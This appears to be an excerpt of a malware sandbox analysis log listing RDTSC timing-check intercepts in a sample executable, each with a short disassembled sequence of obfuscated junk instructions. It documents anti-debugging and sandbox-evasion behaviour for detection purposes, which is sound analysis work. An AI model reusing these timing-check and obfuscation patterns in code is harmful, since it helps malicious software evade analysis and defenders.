Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168DE7F second address: 168DE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168DE83 second address: 168DE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168DE87 second address: 168DE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168E8F2 second address: 168E8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168F110 second address: 168F19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB6E8B0C7E6h 0x0000000a popad 0x0000000b jns 00007FB6E8B0C7E8h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov si, di 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FB6E8B0C7E8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+129C2A52h] 0x0000003a adc edi, 6AE46865h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FB6E8B0C7E8h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c jc 00007FB6E8B0C7ECh 0x00000062 mov esi, dword ptr [ebp+129C3A26h] 0x00000068 jne 00007FB6E8B0C7E8h 0x0000006e xchg eax, ebx 0x0000006f pushad 0x00000070 jp 00007FB6E8B0C7ECh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1690644 second address: 16906DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FB6E8B0AED8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 sub dword ptr [ebp+129C36A7h], esi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FB6E8B0AED8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 jmp 00007FB6E8B0AEE7h 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c jmp 00007FB6E8B0AEDCh 0x00000051 jmp 00007FB6E8B0AEE2h 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jnp 00007FB6E8B0AED8h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1690407 second address: 169040C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16928E2 second address: 169290E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB6E8B0AEE8h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FB6E8B0AED8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169290E second address: 1692918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB6E8B0C7E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1693EEB second address: 1693EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169318B second address: 1693191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1693EEF second address: 1693EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1693191 second address: 1693195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1694406 second address: 1694415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FB6E8B0AED6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1694415 second address: 1694419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16953FB second address: 16954A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007FB6E8B0AED8h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 jmp 00007FB6E8B0AEE3h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FB6E8B0AED8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 jmp 00007FB6E8B0AEDBh 0x00000046 call 00007FB6E8B0AEDCh 0x0000004b jmp 00007FB6E8B0AEE6h 0x00000050 pop edi 0x00000051 push 00000000h 0x00000053 mov di, FAD6h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jc 00007FB6E8B0AED6h 0x00000061 jmp 00007FB6E8B0AEE7h 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1696395 second address: 16963B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1695660 second address: 1695664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16963B2 second address: 16963B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1695664 second address: 1695687 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FB6E8B0AEE3h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16963B7 second address: 1696411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FB6E8B0C7E8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+12B71AD2h], edi 0x0000002d push 00000000h 0x0000002f add ebx, dword ptr [ebp+129C5872h] 0x00000035 xchg eax, esi 0x00000036 jmp 00007FB6E8B0C7EFh 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jns 00007FB6E8B0C7E6h 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169838B second address: 1698395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB6E8B0AED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1698395 second address: 1698399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1698399 second address: 16983A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169B064 second address: 169B068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169BF9A second address: 169BFAC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FB6E8B0AED6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169BFAC second address: 169BFB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169B1A3 second address: 169B244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+129C1BA6h], ebx 0x00000012 sub edi, dword ptr [ebp+129C2C3Ah] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f jns 00007FB6E8B0AEDCh 0x00000025 add dword ptr [ebp+12B4C6E9h], edx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 jmp 00007FB6E8B0AEDBh 0x00000037 mov eax, dword ptr [ebp+129C01ADh] 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007FB6E8B0AED8h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 jmp 00007FB6E8B0AEDBh 0x0000005c push FFFFFFFFh 0x0000005e mov dword ptr [ebp+129C3A26h], ecx 0x00000064 mov edi, dword ptr [ebp+129C3A4Fh] 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f je 00007FB6E8B0AED6h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169B244 second address: 169B25A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169B25A second address: 169B274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEE6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169D058 second address: 169D05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169D05C second address: 169D062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 169E2CF second address: 169E2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A1E67 second address: 16A1E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FB6E8B0AEECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A0166 second address: 16A016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A3685 second address: 16A3689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A3689 second address: 16A368D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A368D second address: 16A3693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A4602 second address: 16A4614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b ja 00007FB6E8B0C7E6h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A93FF second address: 16A9405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A9405 second address: 16A940F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16A940F second address: 16A9420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB6E8B0AED6h 0x0000000a jbe 00007FB6E8B0AED6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16463DA second address: 16463DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16463DE second address: 16463E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1642E19 second address: 1642E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1642E23 second address: 1642E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AB565 second address: 16AB587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB6E8B0C7EDh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 ja 00007FB6E8B0C7ECh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AB587 second address: 16AB593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB6E8B0AEDCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AE2D6 second address: 16AE2DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AE2DE second address: 16AE2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AFD6E second address: 16AFD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AFD77 second address: 16AFD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16AFD7B second address: 16AFD81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B2FE2 second address: 16B2FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B316F second address: 16B319F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FB6E8B0C7F9h 0x00000013 popad 0x00000014 jbe 00007FB6E8B0C7E8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B319F second address: 16B31BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B31BC second address: 16B31C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B31C2 second address: 16B31C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B34E3 second address: 16B34EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16B34EC second address: 16B34FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16BA696 second address: 16BA6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16BEEFC second address: 16BEF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16BF2C4 second address: 16BF2D6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB6E8B0C7E6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16BF2D6 second address: 16BF2E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007FB6E8B0AEDEh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C3E26 second address: 16C3E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C3F81 second address: 16C3F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C3F87 second address: 16C3FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007FB6E8B0C7E6h 0x00000010 jns 00007FB6E8B0C7E6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C414D second address: 16C4152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C44A3 second address: 16C44A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4906 second address: 16C490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C490A second address: 16C4926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4926 second address: 16C4930 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB6E8B0AED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4930 second address: 16C493C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C493C second address: 16C4940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4940 second address: 16C4966 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007FB6E8B0C7E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB6E8B0C7F2h 0x00000013 jnc 00007FB6E8B0C7E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4966 second address: 16C496A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C496A second address: 16C49A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007FB6E8B0C7F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C49A4 second address: 16C49A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4C99 second address: 16C4CA2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4F35 second address: 16C4F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C4F39 second address: 16C4F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FB6E8B0C7EEh 0x0000000c jnp 00007FB6E8B0C7E6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jmp 00007FB6E8B0C7EEh 0x0000001c pop ecx 0x0000001d push ebx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16C9EBD second address: 16C9EC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
